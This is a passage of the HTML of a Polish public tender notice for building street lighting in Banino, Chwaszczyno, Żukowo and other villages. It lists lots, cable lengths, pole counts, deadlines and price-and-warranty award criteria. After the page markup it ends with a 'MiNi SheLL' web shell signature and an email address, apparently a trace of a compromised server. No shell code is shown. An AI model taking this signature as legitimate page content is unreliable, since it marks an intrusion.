umowie wynikających z powyżej wskazanych zmian.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-09-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia drogowego w Baninie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego w Baninie:Zadanie 1 - Budowa linii energetycznej oświetleniowej kablowej w Baninie ul. Lawendowa; Zadanie 2 - Budowa oświetlenia ulicznego w Baninie ul. Polna i Słoneczna;Zadanie 3 - Budowa linii energetycznej oświetleniowej kablowej w Baninie ul. Pszenna (kontynuacja zadania);Zadanie 4 - Przebudowa drogi gminnej polegająca na budowie linii kablowej 0,4kV w Baninie ul. Rolnicza;Zadanie 5 - Budowa oświetlenia ulicznego w Baninie ul. Żeglarska.Zadanie 1: 1.	Zakres robót obejmuje:1)	słupy od istniejącego 9/3: 10/3, 11/3, 12/3, 13/3, 15/3, 2)	wybudowanie nowej linii kablowej YAKXS 4x35mm2 długości 158 mb zgodnie z dokumentacją projektową, 3)	budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 5 szt. zgodnie z dokumentacją projektową,4)	montaż 5 opraw oświetleniowych typ LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.2.	Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,,Budowa linii energetycznej oświetleniowej kablowej w Baninie ul. Świerkowa, Diamentowa, Jaśminowa, Lawendowa, Cyprysowa, Balladyny, Lipowa".Zadanie 2:1. Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Polnej i ul. Słonecznej w Baninie2. Zakres robót obejmuje:1) słupy od istniejącego 5/3: 6/3, 7/3, 8/3, 9/3 i słupy od istniejącego 4/3: 4.1/3, 4.2/3, 4.3/3, 4.4/3, 2) wybudowanie nowej linii kablowej YAKXS 4x35mm2 długości 349 mb zgodnie z projektem, 3) budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 8 szt. zgodnie z projektem,4) montaż 8 opraw oświetleniowych LED o mocy 52W, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3.	Podstawą do realizacji robót jest projekt budowlany ,,Przebudowa drogi gminnej polegająca na budowie oświetlenia ulicznego w miejscowości Banino ul. Polna, Radosna, Tęczowa, Szczęśliwa i Słoneczna". Zadanie 3:1.	Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Pszennej w Baninie. 2.	Zakres robót obejmuje:1)	słupy od istniejącego 7/1: 6/1, 5/1, 4/1, 3/1, 2/1, 1/1,2)	wybudowanie nowej linii kablowej YAKXS 4x35mm2 długości 293 mb (kontynuacja zadania), 3)	budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 6 szt. zgodnie z projektem,4)	montaż 6 opraw oświetleniowych LED o mocy 50W, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej,5)	budowę szafki oświetleniowej SO-1.3. Podstawą do realizacji robót jest projekt budowlany ,,Budowa linii energetycznej oświetleniowej kablowej 0,4 kV w Baninie ul. Pszenna".Zadanie 4:1.	Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Rolniczej w Baninie. 2.	Zakres robót obejmuje:1)	słupy od szafki oświetleniowej: 1/1, 2/1, 3/1, 4/1, 5/1, 6/1, 7/1, 8/1 oraz słup 1/2, 2)	wybudowanie nowej linii kablowej YAKXS 4x25mm2 długości 336 mb, 3)	budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 9 szt. zgodnie z projektem,4)	montaż 9 opraw oświetleniowych LED zgodnie z dokumentacją projektową,5)	budowę szafki oświetleniowej SO-1.3. Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,, Przebudowa drogi gminnej polegająca na budowie linii kablowej oświetlenia 0,4kV w Baninie ul. Rolnicza".Zadanie 5:1.	Zamówienie obejmuje wykonanie oświetlenia ulicznego w części ul. Żeglarskiej w Baninie. 2.	Zakres robót obejmuje:1)	słupy od istniejącego 3/2: 4/2, 5/2, 5.1/2, 5.2/2, 2)	wybudowanie nowej linii kablowej YAKXS 4x25mm2 długości 161 mb, 3)	budowę nowych słupów stalowych stylowych na fundamentach betonowych w ilości 4 szt. zgodnie z projektem,4)	montaż 4 opraw oświetleniowych LED typu szyszka o mocy 38W zgodnie z dokumentacją projektową.3. Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,,Przebudowa drogi gminnej polegająca na budowie oświetlenia ulicznego 0,4 kV w Baninie ul. Sosnowa, Cedrowa, Żeglarska, Dębowa, Kościelna".<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45231400-9, 45316110-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 60<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Zamawiający wymaga realizacji robót budowlanych i opracowaniaoperatu kolaudacyjnego (do dnia zgłoszenia gotowości do odbioru końcowego) w terminie do 60 dni liczącod dnia przekazania terenu budowy.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia drogowego w Chwaszczynie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego w Chwaszczynie:Zadanie 1 - Budowa sieci oświetleniowa drogowego w Chwaszczynie ul. Kaszubska Droga; Zadanie 2 - Budowa oświetlenia w Chwaszczynie ul. Polna;Zadanie 3 -	Budowa oświetlenia w Chwaszczynie ul. Kawelska, Zaciszna;Zadanie 4 - Budowa kablowej linii oświetlenia ulicznego w Chwaszczynie ul. Leśmiana.Zadanie 1:1. Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Kaszubska Droga w Chwaszczynie (kontynuacja zadania od słupa 26/1).2. Zakres robót obejmuje:1) słupy 27/1, 28/1, 29/1, 30/1, 31/1, 32/1, 33/1, 2) budowa nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 7 szt. zgodnie z projektem,3) wybudowanie nowej linii kablowej YAKXS 4x35mm2 długości 332 mb zgodnie z projektem, 4) montaż 7 opraw oświetleniowych wykonanych w technologii LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3.	Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,,Budowa sieci oświetleniowa drogowego - Chwaszczyno ul. Kaszubska Droga, ul. Jarzębinowa, ul. Klonowa, ul. Brzozowa".Zadanie 2:1.	Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Polnej w Chwaszczynie (kontynuacja). 2.	Zakres robót obejmuje:1)	słupy od istniejącego 2/1b: 3/1b, 4/1b, 5/1b, 6/1b, 7/1b,2)	wybudowanie nowej linii kablowej YAKXS 4x35mm2 długości 160 mb zgodnie z projektem, 3)	budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 5 szt. zgodnie z projektem,3)	montaż 5 opraw oświetleniowych wykonanych w technologii LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3. Podstawą do realizacji robót jest projekt budowlany ,,Oświetlenie ulicy Polnej w Chwaszczynie".Zadanie 3:1.	Zamówienie obejmuje wykonanie oświetlenia drogowego części ul. Kawelskiej i ul. Zacisznej w Chwaszczynie (kontynuacja).2.	Zakres robót obejmuje: 1)	Obwód 1:1.1)	wybudowanie na fundamentach betonowych:a)	1 słupa stalowego ocynkowanego od istniejącego słupa 4/1 do 5/1, b)	1 słupa stalowego ocynkowanego od istniejącego słupa 3/4/1 do 5/4/1,1.2) budowę linii kablowej YAKXS 4x35 mm2 długości 170 mb,2) Obwód 2:2.1) wybudowanie na fundamentach betonowych:a)	1 słupa stalowego ocynkowanego od istniejącego 3/1 do 4/1,b) 1 słupa stalowego ocynkowanego od istniejącego 4/2 do 6/2,2.2) budowę linii kablowej YAKXS 4x35 mm2 długości 180 mb,3) montaż 4 opraw oświetleniowych LED o mocy 35 W, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3. Podstawą do realizacji robót jest projekt budowlany ,,Oświetlenie osiedla Józefin w Chwaszczynie, Chwaszczyno, gm. Żukowo, dz. nr: 1153, 1184, 1222, 771/8, 771/48, 1137, 1131, 1165, 762".Zadanie 4:1. Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Leśmiana w Chwaszczynie (kontynuacja).2. Zakres robót obejmuje:1) słupy od istniejącego 12.12/4: 12.13/4, 12.14/4, 12.15/4, 12.16/42) wybudowanie nowej linii kablowej YAKXS 4x25mm2 o długości 124 mb zgodnie z projektem,3) budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 4 szt. zgodnie z projektem,4) montaż 4 opraw oświetleniowych LED o mocy 35W w II klasie ochronności z redukcją mocy.3. Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,,Projekt oświetlenia ulicznego w miejscowości Chwaszczyno. Oświetlenie ulic Jana Pawła II, Staffa, Asnyka, Leśmiana, Żeromskiego, Gałczyńskiego".<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45231400-9, 45316110-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 60<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Zamawiający wymaga realizacji robót budowlanych i opracowaniaoperatu kolaudacyjnego (do dnia zgłoszenia gotowości do odbioru końcowego) w terminie do 60 dni liczącod dnia przekazania terenu budowy.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Budowa oświetlenia drogowego w Miszewku, Przyjaźni, Żukowie, Lniskach, Tuchomiu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Budowa oświetlenia drogowego w Miszewku, Przyjaźni, Żukowie, Lniskach, Tuchomiu:Zadanie 1 - Budowa oświetlenia ulicznego w Miszewku ul. Brzozowa; Zadanie 2 - Budowa oświetlenia drogowego w Przyjaźni ul. Okrężna;Zadanie 3 - Budowa oświetlenia ulicznego w Żukowie ul. Słowackiego; Zadanie 4 - Budowa oświetlenia ulicznego w Żukowie ul. Kościerska;Zadanie 5 - Budowa kabla energetycznego i oświetlenia ulicznego w Lniskach ul. Słoneczna, Klonowa;Zadanie 6 - Budowa oświetlenia ulicznego w Tuchomiu ul. Kwiatowa.Zadanie 1:1.	Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Brzozowej w Miszewku.2.	Zakres robót obejmuje:1)	budowę słupów od istniejącego słupa 2/2: 3/3, 4/3, 2)	budowę słupów od istniejącego słupa 5/1: 6/1, 7/1,2) wybudowanie nowej linii kablowej YAKXS 4x25mm o długości 180 mb zgodnie z projektem, 3) budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 4 szt. zgodnie z projektem,4) montaż 4 opraw oświetleniowych LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3. Podstawą do realizacji robót jest projekt budowlany ,,Przebudowa drogi gminnej polegająca na budowie oświetlenia ulicznego w miejscowości Miszewko ul. Brzozowa dz. Nr 56/22 obręb Miszewko gm. Żukowo". Zadanie 2:1. Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Okrężnej w Przyjaźni.2. Zakres robót obejmuje:1) budowę słupów 1/3, 2/3, 3/3, 4/3, 5/3, 6/3, 4.2/12) wybudowanie nowej linii kablowej YAKXS 4x25mm2 o długości 243 mb zgodnie z projektem, 3) budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 7 szt. zgodnie z projektem,4) montaż 7 opraw oświetleniowych LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3. Podstawą do realizacji robót jest projekt budowlany ,,Budowa linii energetycznej oświetleniowej kablowej 0,4 kV Przyjaźń ul. Okrężna". Zadanie 3:1.	Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Słowackiego w Żukowie (kontynuacja).2.	Zakres robót obejmuje:1) budowę słupów 1/2, 2/2, 3/2, 4/2, 5/2, 6/2, 7/2, 8/2, 2) wybudowanie nowej linii kablowej YAKXS 4x25mm2 o długości 296 mb zgodnie z projektem, 3) budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 8 szt. zgodnie z projektem,1)	montaż 8 opraw oświetleniowych LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3.	Podstawą do realizacji robót jest projekt budowlany ,,Przebudowa drogi gminnej polegająca na budowie oświetlenia ulicznego w miejscowości Żukowo ul. Słowackiego dz. nr 78/33, 929/7 , 81/14 , 77/2 , 1406, obręb Żukowo M Gm. Żukowo".Zadanie 4:1.	Zamówienie obejmuje wykonanie oświetlenia ulicznego przy drodze krajowej nr 20 ul. Kościerska w Żukowie.2.	Zakres robót obejmuje:1)	słupy od istniejącego słupa 309: 1/309, 2/309, 3/309, 4/309,2)	wybudowanie nowej linii kablowej YAKXS 4x35mm2 długości 135 mb zgodnie z projektem, 3)	budowę nowych słupów stalowych ocynkowanych na fundamentach betonowych w ilości 4 szt. zgodnie z projektem,4)	montaż 5 opraw oświetleniowych typ LED o mocy 96W, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej.3. Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,,Budowa kablowej linii oświetlenia ulicznego 0,4 kV w miejscowości Żukowo ul. Kościerska dz. nr 814/6 i 1212 Droga Krajowa DK-20 Gm. Żukowo - kategoria obiektu XXVI".Zadanie 5:1. Zamówienie obejmuje wykonanie oświetlenia drogowego w części ul. Słonecznej i Klonowej w Lniskach (kontynuacja).2. Zakres robót obejmuje:1) budowę słupów stalowych na ul. Słonecznej od istniejącego słupa 5/3: 7/3, 7.2/3, 7.4/3, 2) wybudowanie nowej linii kablowej YAKY 4x35mm2 o długości 187 mb na ul. Słonecznej, 3) budowę nowych słupów stalowych ocynkowanych o wysokości 6 m + wysięgnik na fundamentach betonowych w ilości 3 szt. na ul. Słonecznej,4) montaż 3 opraw oświetleniowych LED o mocy 32 W na ul. Słonecznej, 5) budowę 2 słupów stalowych 12/2, 14/2 na ul. Klonowej (linia kablowa istniejąca),6) budowę słupów stalowych od istniejącego słupa 17/2: 18/2, 19/2, 20/2, 21/2,7) wybudowanie nowej linii kablowej YAKY 4x35 mm2 o długości 195 mb na ul. Klonowej,8) budowę nowych słupów stalowych ocynkowanych o wysokości 6 m + wysięgnik na fundamentach betonowych w ilości 6 szt. na ul. Klonowej, 9)	montaż 6 opraw oświetleniowych LED o mocy 50 W na ul. Klonowej. 3. Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,,Projekt oświetlenia ulicznego w miejscowości Lniska na terenie dz. 194, 193/12, 193/13, 192/55, 192/19, 191/10, 191/6".Zadanie 6:1.	Zamówienie obejmuje wykonanie oświetlenia ulicznego ul. Kwiatowej w Tuchomiu. 2.	Zakres robót obejmuje:2)	słupy 1/1, 2/1, 3/1, 4/1 i 1/2, 2/2, 3/2, 4/2,2)	wybudowanie nowej linii kablowej YAKXS 4x25mm2 o długości 216 mb zgodnie z projektem, 3)	budowę nowych słupów stalowych na fundamentach betonowych w ilości 8 szt. zgodnie z projektem,4)	montaż 8 opraw oświetleniowych typ LED, spełniających wymagane parametry oświetleniowe ujęte w dokumentacji projektowej,5) budowa szafki oświetleniowej.3. Podstawą do realizacji robót jest projekt budowlano-wykonawczy ,, Przebudowa drogi gminnej polegająca na budowie linii kablowej 0,4 kV oświetlenia ulicznego ul. Kwiatowa w Tuchomiu" .<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45231400-9, 45316110-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 60<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Zamawiający wymaga realizacji robót budowlanych i opracowaniaoperatu kolaudacyjnego (do dnia zgłoszenia gotowości do odbioru końcowego) w terminie do 60 dni liczącod dnia przekazania terenu budowy.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com